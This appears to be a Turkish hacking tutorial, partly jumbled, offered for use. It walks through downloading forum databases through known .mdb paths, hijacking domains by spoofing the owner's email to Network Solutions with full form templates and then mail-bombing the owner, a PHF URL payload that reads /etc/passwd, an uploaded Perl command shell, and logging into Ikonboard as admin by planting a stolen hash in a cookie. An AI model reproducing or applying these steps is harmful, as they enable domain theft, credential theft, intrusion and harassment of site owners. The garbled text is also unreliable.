şifrelerini görebilirsiniz>daha sonra karşınıza bu dosyayı yüklemek istiyormusunuz diye bişey gelicek kaydet diyin ye dosyayı yükleyin. yaza bilirsiniz. 1-Google dan Sntiz forum diye arattığınız sitelerin sonuna "/snitz_forums_2000.EXAMPLE. color=#800080 www. Zone Contact. * Maillerinizle kandırabilme özelliği.mdb alın şimdi bir site bunu hacklemenize gerek yok çünkü bişey yapmamış color=#0000ff http://www.1-Bu olayı herkez yapabilir çok basit bir yöntem.org . Technical Contact.org adlı adresi alacağız.ORG Administrative Contact. ADMIN (ADM001) ADMINEMAIL@EXAMPLE.2.com dan bu isimleri aratıyorsunuz orda size yüzlerce forum çıkar (Web Wiz forum olarak aratın) örneğin color=#0000ff www. Billing Contact: DOMAIN.networksolutions.COM Record last updated on 00-Jan-2000.mdb" yi ekleyin örneğin color=#0000ff www. (Mail adresini kullanabişliyor olun mutlaka.google. Registrant: Example (ex24-DOM) Address details Domain Name: EXAMPLE.mdb NOT: Bu BİLİNEN kolay bir hack yöntemidir.3.NET 1.com . Domain servers in listed order: NS1.gov ..5 .Bu teknik Internicin yeterli güvenliği sağlayamaması nedeniyle ortaya çıkıyor.mdb 2-Google dan Web Wiz Guide forum diye aratığınız sitelerin sonuna "/admin/wwForum..2.com/ adresine gidin.ahmetyigit.) Exploit: Şimdi örnek olarak biz Example. Record created on 00-Jan-2000.ahmetyigit. http://www.

Versiyon Numarasını Değiştirmeyin Contact Version Number: 1.....Expert yazılı olana tıklayın ...........DOmain Name girişini yapın.com ...............Şimdi 'Proceed to Set Authorization Scheme' seçeneğini seçin ...0 Detayları web sayfasından alıp yazın Authorization 0a.. (I)ndividual (R)ole... E-Mailbox.. ...... Country... Değişiklik sonrası Onay (Confirm) mailinin hangi adresten geldiğini kontrol eder......... Yani bizde onay mailini sanki bu adresten geliyormuş gibi göstermeliyizki domain değişikliğimiz kabul edilsin. Fax Number.: Contact Information 1a...MAIL-FORM seçeneğini seçin ve 'Go on to Contact Data Information' düğmesine basın..............: Individual 1c....: 1k.... ..: 1j........ Street Address.Şimdi Admin ile ilgili bütün bilgiler karşınıza gelecektir. .... ....... ..Network Solutions adresine gidelim..: 1h.. Auth Scheme. Phone Number..İki mavi buton göreceksiniz .: 1i.: 1f. Adım adım işlemler. Internic Authentication işlemi için Domain sahibinin gerçekten siz olup olmadığına bakmaz. Postal Code.......: DOMAIN. 2) Yada size ait olan bir web sunucusuna geri alınana kadar yönlendirebiliriz.Şimdi Aşağıdaki Mail Şablonuna bakın..Şimdi Proceed to Contact Information penceresi gelecek . State..... NIC Handle.... ..Şimdi İki seçeneğimiz var: 1) Domain in tüm kontrolünü Administrator olarak elimize alır ve değişiklik yapabiliriz..: MAIL-FROM 0c.... ADMIN 1d. Bu mail Domain sahibinin adresine gelir.Birinci kutucuğa ADMIN yöneticisin girin.Sonraki ekranda 'Select the form that meets your needs' başlıklı bri sayfa gelecek ..Modify seçeneğini seçin........Mail alanına gidin ve sizin Fake mail adresinizi yazın.com) .Make Change linkine tıklayın.. İlk Saldırı Şekli.......... (N)ew (M)odify (D)elete.....Contact Form linkine tıklayın .. (example... Yani Domain için değişiklik yapınca size bir onay maili gelir..COM adresine gelecektir...Tekrar MAIL-FORM seçip admin mail adresini girin (ADMINDEMAIL@EXAMPLE...: evil@domain.. (example..org için ADM001) ......Alttaki Seçeneği No olarak işaretleyin ve Generate Contact Form seçin .......COM) .........com .İkinci kutucuğa domain sahibinin mail adresini yazın.: 1g. Organization Name.....İki tane bilgi girişi için text box göreceksiniz.. .: EXAMPLE 1e. City. ( example.org için ADMINEMAIL@EXAMPLE..org gibi) .... Name. Auth Info.phyton@hotmail...: 1l...... Mesela örneğimizde ADMINEMAIL@EXAMPLE.: Modify 0b..: ADM001 1b...

... The zone files.... Auth Info..... The easiest way to do this is simply to reply to this message... are normally updated twice daily. Notify Use. Should you wish to modify or delete an existing domain name registration. Eastern Standard Time...in-template. please come and visit our site via www browser or ftp and pick-up the latest domain template or review the Domain Name Registration Service Agreement at the URL's: Domain Name Registration Service Agreement http://www..-agreement.: AFTER-UPDATE 2b.. please include the tracking number [NIC-000128..html Domain Name Registration Template ftp://www... If you have not already done so.. Network Solutions Registration Services IMPORTANT INFORMATION On January 15..txt for all template requests.. Örnek: Subject: [NIC-000128. You will be notified when it has been completed...com/temp.com... This acknowledgement is "NOT" a confirmation that your request has been processed. 2000...networksolutions.: ADMINEMAIL@EXAMPLE..Notify Information 2a. please use the Network Solutions Service Agreement. 7 days a week at 5:00 küfür yasak and 5:00 PM U.COM 3c.. Public (Y/N)..com/temp...html.: MAIL-FROM 3b. Auth Scheme....0 template located at ftp://www..... 2000. 2000.networksolutions.: NO NOTE: Aşağıda 'Mail this contact form to me!' yazılı butona basmayın. On and after February 1.networksolutions.4r50] Your Mail This is an automatic reply to acknowledge that your message has been received by hostmaster@networksolutions.com/leg.... Version 6..com/leg. Şimdi bu yazıyı kopyalayın ve Anonymous Remalerinize yapıştırın. which make the Internet work. Version 6...: AFTER-USE Authentication 3a..com adresinden bir confrim maili gelecektir.in-template..-agreement.. Requests that are completed before these times will be included in that 12-hour zone file update and will normally begin to take effect within 5-6 hours... If you should have need to correspond with us regarding this request.txt Regards.. you can do so ... The terms and conditions of the Service Agreement are available on our Web site at: http://www...networksolutions. Notify Updates. All versions of the Service Agreement template will continue to be accepted and processed until January 31..... Network Solutions introduced Service Agreement. Siz bu maili yolladığınızda (Adminin mail adresinden spoof yaparak tabiki) ADMIN mailine hostmaster@networksolutions....4r50] in the subject... Şimdi zor kısmına geldik..0..S.

...3f6y] [NIC-000128..... (I)ndividual (R)ole.....4rg7] [NIC-000128.: Contact Information 1a. (N)ew (M)odify (D)elete.. Mail adresinin Body sindeki numarayı da değiştirmeyi unutmayın...: DOMAIN. ADMIN 1d.53d0] [NIC-000129.. using our Service Agreement..5d8t] [NIC-000127.. Network Solutions Registration Services e-mail: help@networksolutions.. complete and submit the Contact Form to hostmaster@internic...... replace a contact/agent with a different contact/agent.....: Individual 1c. 10 15 tane mail atın. Mesela [NIC000128..: EXAMPLE 1e.4r30] [NIC-000127...... This form is available on our Web site at www..r609] [NIC-000128..networksolutions... City...: ...... Auth Scheme.0 Detayları kendinize göre değiştirin Authorization 0a.: ADM001 1b.com adresine hostmaster@internic.: MAIL-FROM 0c. Böylece kurban hangi maile cevap vereceğini bilemeyecek bunun bir saldırı olduğunu düşünecektir... or change primary and/or secondary name server information.. Street Address......net. Name. To update information about an existing contact....: 1f...online... Mesaj az öcenki ile aynı konu ve gövde de olacak. such as postal address.......523f] [NIC-000127. Bu yüzden mail bomberinizle 20-30 tane bu tarz mail yollayın.... Auth Info....net.. 35 tane aynı adresten mail geldiğini görünce karşı taraf silecektir. Version numarasını değiştirmeyin Contact Version Number: 1. Mail bomberinize Tracking numarasını aynı girmeyin...com adresinden geliyormuş gibi göstererek hostmaster@networksolutions..... complete and submit the Host Form to hostmaster@internic....: 1g... e-mail address or telephone number..........com Bu mesajı domain sahibi alırsa kolayca fark edecektir olayı.5089] [NIC-000128.net adresinden gelen mailler atın......com adresine aşağıda şablonu olan mailden bir tane yollayın. State. You can change the registrant's address. Şimdi Fake mailimize geldi Remailer ile Adminemail@example.r509] [NIC-000128.... [NIC-000127.: Modify 0b..com To register or update information about a name server. NIC Handle..... Bunu böyle düşünmesi içinde nuamralamad aşağıdaki sıralamaya benzer bir sıralama kullanın.....d307] admin@example... This form is also available on our Web site. Organization Name....4r50] şeklinde değişken numaralar kullanın.

E-Mailbox.: 1i. Nasıl bulunur? Script yazmayı bilenler bunu bulur... Auth Info... Şimdi en önce olayı mantık ve felsefe sınırlarına oturtalım..1h...... o sistemi kıramazsın! Bunu bir diğer anlamda açıklarsak bir sistemin arkasını görmeden onu önden çökertemezsin. Şimdiden söylüyorum aranızda bu işlerden anlamayan veya kafası bu tarz işlere basmayanlar varsa bu yazıyı okuyupta vaktini boşa harcamasın.. Felsefem ise şu: Bir sistemin nasıl çalıştığını bilmeden. Mesela Brute Force. 24 Saat içinde admin ayarları değişecek ve yeni admin siz olacaksınız... Sadece FTP bil yeter....... Mesela diğer bir yöntem..... Commander...... Dict Attack falan.. Notify Use....... ftp ile yetkimin olmadığı dosyalara ulaşır istediğimi silerim falan! Anladınız mı? Bakın ne kadar basit! Gidin bunu beleş yer veren yerlere yapın bakalım şimdi. Gerisi avcunu yalar. Tracking Nuamrasını değiştirmeyi unutmayın... Public (Y/N).. Mesela benim hostingimi ****************** sağlıyor ve site adı *********... Olaya giriyorum.........: MAIL-FROM 3b. Auth Scheme....... Phone Number. Fax Number... Bu benim kendi felsefem.... bazılarını kırmak gerekir falan Cracker Jack tarzı programlarla kırarsın olur biter. Kaynak koda bakarsın... Notify Updates... Peki yöntemler neler.COM 3c..: 1l. PHF kullanan sitelere şunu yazarsak bize şifrelerin bulunduğu yer gözükür /cgi-bin/phf?Qalias=x%0a/bin/cat %20/etc/passwd .com adresini mail bombaredımanına tutun.. 35 tane kadar atın mail..com Notify Information 2a... Şimdi bana ayrılan subdomain olan spmaster a ben bunları upload edip çalıştırsam....: 1k....: AFTER-UPDATE 2b..: 1j.........: AFTER-USE Authentication 3a... Bu işlerde yeteniği olan kişiler yanlızca web hacking yapabilir. Herkezin yapacağı basit yöntemler var başta. Bunları yapmak için nerdeyse web bilmeye bile gerek yok. . Postal Code.. Sonra tekrar adminemail@example.com adresine. Nasıl açıklar olabilir bunlar.PL... Çoğu site yama**ştır şimdi ama bu bir açık.... Country.... Tabii bunlar Lamerlara göre şeyler...com. Peki ne bu? mesela senin bir web siten yok! Ama web hacking yapmak istiyorsun mümkün mü? Hayır değil! Nasıl işlediğini bilmediğin birşeye zarar veremezsin.... açık olduğunu işleyiş tarzından anlarsın işte YOL! Burdan şifreleri alırsın bazılar Shadowed falan olur...: evil@domain...pl upload edildiği UNIX makinalara CHMOD 777 ve 755 sayesinde istediğiniz komutu girmenizi sağlayan birşey... Şimdi bu bir yöntemdi ama başkalarıda var hatta hayal bile edilmemişleri var bu işlerde...: ADMINEMAIL@EXAMPLE.. Sadece bir tane yollayın hostmaster@networksolutions.. Ne bu? Açık tabii ki.Şimdi web hacking olayı Hack olayının en akıl isteyen kısmıdır.... 3.....: NO NOTE: Konu kısmını kesinlikle boş bırakın... biz olayı aştığımız için fazla bilgi isteyen şeyleri yapıcaz..... En önce bir sisteme girmek için açık olması gerekli ki açıktan dalalım.. mesela bir script açığı PHF gibi... şimdi diyeceksiniz ne bu? Bu commander.

Çünkü bende ikonboard kullanıyorum. Bu iş bu kadar kolay! . Bende benim forumdan ve onun forumdan ona PM attım ve bu dosyaları istedim. Bu sayede ben tüm forumdaki kullanıcılara şifrelere ve maillere ulaşabilirim. Panick bana jayjay diye bir dostunun olduğunu söyledi. Bende baktım olmuyor bekle bekle.COM yazıyor. Bu kadar basit! Ha bu şifereler ENCRYPT edilmiş olacağından siz okuyamazsınız bunları. Ondan çok özür diliyorum bunu anlattığım için ama merak etmesin bu yazıyı okuyanların %99 u sana zarar verebilecek kadar bu işleri iyi bilmiyor.pm yazmam yeterli.com/cgibin/ikon3. Peki diyelim ki ben kötü biriyim ve neler yaparım.. Bir baktım ki onlarda bizim formumumuz olan IKONBOARD un aynısını kullanıyor. Ona girerim ve gerisini siz düşünün artık.. isteyin dosyayı Admin odasından siliyorsun değişitriyosun falan. Mesela hata mesajlarını bulunduran dil dosyasını istiyorsam http://www.n/ErrorWords. O yüzden sanıyorum sakıncası olmayacaktır.tymsah. Tabii ben okurum bunları. Kendi bilgisayarımdaki COOKİE dosyasını açarım. ve forumun dil dosyalarını indirmeye başladım yaptığım şu idi. Bana vereceğini söyledi. Baktım olmuyor.. Olay basit aklını kullanacaksın. aradan vakit geçti dosyaları alamadım çünkü tymsah sanıyorum ki evinde değilmiş şehir dışındaymış. bende baktım bize üye olmuş site kısmındada TYMSAH. Merak ettim siteye gittim. Şimdi başlıyım. Neyse baktım tymsah benim türkçeleştirmediği yerleri de türkçeleştirmiş forumun. Yani tüm klasörlerin nerede ve hangi isimle olduğunu biliyorum. Allah'a şükür bu işlerden anladığım için hemen yapmam gerekeni yaptım ve onun bana yollayacağı dosyaları kendim aldın nasıl mı? Ben ikonboard'un dil dosyalarını falan nereye kurduğunu biliyorum. Forum adminin ID sini ve ENCRYPT edilmiş şifresini o databaseden alırım ve kendi COOKİE dosyama koyarım. Söyliyim şimdiden ikinci seçenektekiler için üzgünüm. Sonrada sitenin tama**nı hack ederim.. İlk yapıcağım iş forumun DATABASE dosyasını ele geçirmek olacaktır. Şimdi benim bulduğum bir yöntem! Bunu açıkla**yacaktım çünkü sonuçta bahsediceğim şahıs benim sitemin bir ziyaretçisi. Bu da basit en önce aldığım şifre ile FTP de bir deneme yaparım. Dan diye ben bu dosyayı download edebiliyorum. Zaten bu yazıyı okuyorsanız ya kendinizi geliştirmek istiyorsunuzdur yada bunu öğrenmek istiyorsunuzdur. bu forumların File Managerları var. Bende madem öyle dedim. Bunu DECRYPT etmeniz gerekir. İşte ben böylece tüm dosyaları download ettim ve gördüm ki onun forum ile benim forum farklı versiyon olduğundan dosyalar uyuşmuyor Herneyse ben istediğimi aldım ama iyi bir insan olarak. Forumun sayfasına girince bir bakarım ki ADMİN olarak forumdayım Daha sonra admin şifresini değiştiririm.Diğer bir yöntem derim ama o kadar çokki.

Sign up to vote on this title
UsefulNot useful